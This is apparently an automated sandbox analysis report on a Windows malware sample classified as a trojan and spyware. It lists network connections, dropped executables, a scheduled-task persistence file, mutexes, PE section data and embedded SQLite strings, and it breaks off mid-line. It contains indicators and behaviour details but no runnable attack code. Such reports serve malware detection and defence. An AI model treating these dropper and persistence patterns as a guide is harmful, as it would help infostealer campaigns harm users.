Source: unknown	HTTPS traffic detected: 172.67.174.133:443 -> 192.168.2.5:50148 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.174.133:443 -> 192.168.2.5:50151 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.174.133:443 -> 192.168.2.5:50155 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:50153 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:50154 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.174.133:443 -> 192.168.2.5:50158 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.174.133:443 -> 192.168.2.5:50162 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.174.133:443 -> 192.168.2.5:50163 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.174.133:443 -> 192.168.2.5:50164 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.174.133:443 -> 192.168.2.5:50165 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.174.133:443 -> 192.168.2.5:50166 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.174.133:443 -> 192.168.2.5:50167 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.174.133:443 -> 192.168.2.5:50169 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.174.133:443 -> 192.168.2.5:50172 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.174.133:443 -> 192.168.2.5:50174 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.174.133:443 -> 192.168.2.5:50180 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.174.133:443 -> 192.168.2.5:50183 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.174.133:443 -> 192.168.2.5:50185 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.174.133:443 -> 192.168.2.5:50193 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.174.133:443 -> 192.168.2.5:50198 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:50200 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.174.133:443 -> 192.168.2.5:50202 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.174.133:443 -> 192.168.2.5:50204 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.174.133:443 -> 192.168.2.5:50212 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.174.133:443 -> 192.168.2.5:50215 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:50229 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:50250 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:50260 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:50327 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.189.173.17:443 -> 192.168.2.5:50352 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.5:50394 version: TLS 1.2

System Summary

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: DocumentsKECBGCGCGI.exe.0.dr	Static PE information: section name:
Source: DocumentsKECBGCGCGI.exe.0.dr	Static PE information: section name: .idata
Source: random[1].exe.0.dr	Static PE information: section name:
Source: random[1].exe.0.dr	Static PE information: section name: .idata
Source: skotes.exe.19.dr	Static PE information: section name:
Source: skotes.exe.19.dr	Static PE information: section name: .idata
Source: random[1].exe.22.dr	Static PE information: section name:
Source: random[1].exe.22.dr	Static PE information: section name: .rsrc
Source: random[1].exe.22.dr	Static PE information: section name: .idata
Source: 06d4af6f50.exe.22.dr	Static PE information: section name:
Source: 06d4af6f50.exe.22.dr	Static PE information: section name: .rsrc
Source: 06d4af6f50.exe.22.dr	Static PE information: section name: .idata
Source: random[1].exe0.22.dr	Static PE information: section name:
Source: random[1].exe0.22.dr	Static PE information: section name: .rsrc
Source: random[1].exe0.22.dr	Static PE information: section name: .idata
Source: random[1].exe0.22.dr	Static PE information: section name:
Source: deb333ea90.exe.22.dr	Static PE information: section name:
Source: deb333ea90.exe.22.dr	Static PE information: section name: .rsrc
Source: deb333ea90.exe.22.dr	Static PE information: section name: .idata
Source: deb333ea90.exe.22.dr	Static PE information: section name:
Source: ea44ea94c2.exe.22.dr	Static PE information: section name:
Source: ea44ea94c2.exe.22.dr	Static PE information: section name: .idata

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\DocumentsKECBGCGCGI.exe

File created: C:\Windows\Tasks\skotes.job

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C70AC60	0_2_6C70AC60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7DAC30	0_2_6C7DAC30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7C6C00	0_2_6C7C6C00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C75ECD0	0_2_6C75ECD0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6FECC0	0_2_6C6FECC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7CED70	0_2_6C7CED70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C88CDC0	0_2_6C88CDC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C888D20	0_2_6C888D20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C704DB0	0_2_6C704DB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C82AD50	0_2_6C82AD50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C796D90	0_2_6C796D90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C79EE70	0_2_6C79EE70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7E0E20	0_2_6C7E0E20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C70AEC0	0_2_6C70AEC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7A0EC0	0_2_6C7A0EC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C786E90	0_2_6C786E90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7C2F70	0_2_6C7C2F70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C848FB0	0_2_6C848FB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C76EF40	0_2_6C76EF40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C706F10	0_2_6C706F10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7DEFF0	0_2_6C7DEFF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C700FE0	0_2_6C700FE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C840F20	0_2_6C840F20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C70EFB0	0_2_6C70EFB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7D4840	0_2_6C7D4840
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C750820	0_2_6C750820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C78A820	0_2_6C78A820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C8068E0	0_2_6C8068E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C738960	0_2_6C738960
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C81C9E0	0_2_6C81C9E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C756900	0_2_6C756900
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7349F0	0_2_6C7349F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7C09B0	0_2_6C7C09B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7909A0	0_2_6C7909A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7BA9A0	0_2_6C7BA9A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C77CA70	0_2_6C77CA70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7B8A30	0_2_6C7B8A30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7AEA00	0_2_6C7AEA00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C77EA80	0_2_6C77EA80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C806BE0	0_2_6C806BE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7A0BA0	0_2_6C7A0BA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C82A480	0_2_6C82A480
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C718460	0_2_6C718460
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C78A430	0_2_6C78A430
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C764420	0_2_6C764420
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7464D0	0_2_6C7464D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C79A4D0	0_2_6C79A4D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7A0570	0_2_6C7A0570
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C762560	0_2_6C762560
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C758540	0_2_6C758540
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C78E5F0	0_2_6C78E5F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7CA5E0	0_2_6C7CA5E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C804540	0_2_6C804540
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C848550	0_2_6C848550
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6F45B0	0_2_6C6F45B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C75C650	0_2_6C75C650
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C75E6E0	0_2_6C75E6E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C79E6E0	0_2_6C79E6E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7246D0	0_2_6C7246D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C780700	0_2_6C780700
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C72A7D0	0_2_6C72A7D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C74E070	0_2_6C74E070
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7C8010	0_2_6C7C8010
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7CC000	0_2_6C7CC000
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7100B0	0_2_6C7100B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7DC0B0	0_2_6C7DC0B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6F8090	0_2_6C6F8090
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C768140	0_2_6C768140
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C776130	0_2_6C776130
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7E4130	0_2_6C7E4130
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7001E0	0_2_6C7001E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C788260	0_2_6C788260
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C798250	0_2_6C798250
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C8862C0	0_2_6C8862C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7D8220	0_2_6C7D8220
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7CA210	0_2_6C7CA210
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7CE2B0	0_2_6C7CE2B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7D22A0	0_2_6C7D22A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C702370	0_2_6C702370
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C796370	0_2_6C796370
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C708340	0_2_6C708340
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C772320	0_2_6C772320
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7543E0	0_2_6C7543E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C75E3B0	0_2_6C75E3B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7323A0	0_2_6C7323A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C81C360	0_2_6C81C360
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C842370	0_2_6C842370
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C703C40	0_2_6C703C40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C711C30	0_2_6C711C30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C83DCD0	0_2_6C83DCD0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7C1CE0	0_2_6C7C1CE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C829C40	0_2_6C829C40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C79FC80	0_2_6C79FC80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C849D90	0_2_6C849D90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C763D00	0_2_6C763D00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7D1DC0	0_2_6C7D1DC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6F3D80	0_2_6C6F3D80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C80DE10	0_2_6C80DE10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C723EC0	0_2_6C723EC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C885E60	0_2_6C885E60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C85BE70	0_2_6C85BE70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C81DFC0	0_2_6C81DFC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C883FC0	0_2_6C883FC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C735F20	0_2_6C735F20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6F5F30	0_2_6C6F5F30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7ABFF0	0_2_6C7ABFF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C857F20	0_2_6C857F20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C721F90	0_2_6C721F90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7D3840	0_2_6C7D3840
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C75D810	0_2_6C75D810
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C85B8F0	0_2_6C85B8F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7DF8F0	0_2_6C7DF8F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C70D8E0	0_2_6C70D8E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7338E0	0_2_6C7338E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C79F8C0	0_2_6C79F8C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C77F960	0_2_6C77F960
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7BD960	0_2_6C7BD960
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7B5920	0_2_6C7B5920
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C84F900	0_2_6C84F900
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7659F0	0_2_6C7659F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7979F0	0_2_6C7979F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7399D0	0_2_6C7399D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7999C0	0_2_6C7999C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7D1990	0_2_6C7D1990
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C711980	0_2_6C711980
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7FDA30	0_2_6C7FDA30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C73FA10	0_2_6C73FA10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7A1A10	0_2_6C7A1A10
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	Code function: 19_2_00668860	19_2_00668860
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	Code function: 19_2_00667049	19_2_00667049
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	Code function: 19_2_006678BB	19_2_006678BB
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	Code function: 19_2_006631A8	19_2_006631A8
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	Code function: 19_2_00624B30	19_2_00624B30
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	Code function: 19_2_00662D10	19_2_00662D10
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	Code function: 19_2_00624DE0	19_2_00624DE0
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	Code function: 19_2_00657F36	19_2_00657F36
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	Code function: 19_2_0066779B	19_2_0066779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 20_2_007C8860	20_2_007C8860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 20_2_007C7049	20_2_007C7049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 20_2_007C78BB	20_2_007C78BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 20_2_007C31A8	20_2_007C31A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 20_2_00784B30	20_2_00784B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 20_2_007C2D10	20_2_007C2D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 20_2_00784DE0	20_2_00784DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 20_2_007B7F36	20_2_007B7F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 20_2_007C779B	20_2_007C779B

Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C729B10 appears 89 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C88D930 appears 52 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C723620 appears 83 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C8809D0 appears 284 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C88DAE0 appears 64 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C839F30 appears 33 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C75C5E0 appears 35 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 007980C0 appears 130 times
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	Code function: String function: 006380C0 appears 130 times

Source: mk[1].exe.22.dr	Static PE information: Number of sections : 11 > 10
Source: mk.exe.22.dr	Static PE information: Number of sections : 11 > 10

Source: file.exe, 00000000.00000002.2700354682.000000006F8F2000.00000002.00000001.01000000.0000000A.sdmp	Binary or memory string: OriginalFilenamemozglue.dll0 vs file.exe
Source: file.exe, 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmp	Binary or memory string: OriginalFilenamenss3.dll0 vs file.exe

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe	Static PE information: Section: dhewrjwp ZLIB complexity 0.9945316043619595
Source: random[1].exe0.22.dr	Static PE information: Section: dhewrjwp ZLIB complexity 0.9945316043619595
Source: deb333ea90.exe.22.dr	Static PE information: Section: dhewrjwp ZLIB complexity 0.9945316043619595

Source: classification engine

Classification label: mal100.spre.troj.spyw.evad.winEXE@153/383@49/37

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C760300 MapViewOfFile,GetLastError,FormatMessageA,PR_LogPrint,GetLastError,PR_SetError,

0_2_6C760300

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\YNY3BN3Z.htm

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2140:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6580:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5628:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6452:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8752:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7152:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8364:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7132:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5632:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2276:120:WilError_03

Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

File created: C:\Users\user\AppData\Local\Temp\4d8fcdb3-6533-4f53-b8ac-1268bf831d3c.tmp

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: file.exe, 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000000.00000002.2699312811.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2691103930.000000001DBBE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: file.exe, 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000000.00000002.2699312811.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2691103930.000000001DBBE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: file.exe, 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000000.00000002.2699312811.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2691103930.000000001DBBE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: file.exe, 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000000.00000002.2699312811.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2691103930.000000001DBBE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: file.exe, file.exe, 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000000.00000002.2699312811.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2691103930.000000001DBBE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000000.00000002.2699312811.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2691103930.000000001DBBE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: file.exe, 00000000.00000002.2699312811.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2691103930.000000001DBBE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: file.exe, 00000000.00000003.2443937136.000000001DA6D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2362413256.000000001DA79000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3453305422.0000000005339000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3471860958.000000000536D000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3452883233.0000000005356000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3575834748.0000000005F65000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3592421360.0000000005F83000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3575383480.0000000005F84000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 00000021.00000003.3758821862.0000000005E34000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 